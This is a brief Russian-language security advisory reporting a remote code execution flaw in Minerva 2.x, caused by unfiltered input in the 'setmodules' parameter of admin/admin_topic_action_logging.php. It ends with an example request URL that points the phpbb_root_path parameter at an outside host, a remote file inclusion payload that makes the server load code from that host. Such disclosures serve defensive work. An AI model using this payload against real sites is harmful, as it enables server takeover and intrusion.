Программа: Minerva 2.x
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "setmodules" сценарием admin/admin_topic_action_logging.php.
Пример:
http://www.example.com/[Script Path]/admin/admin_topic_action_logging.php? setmodules=attach&phpbb_root_path=http://www.example2.com
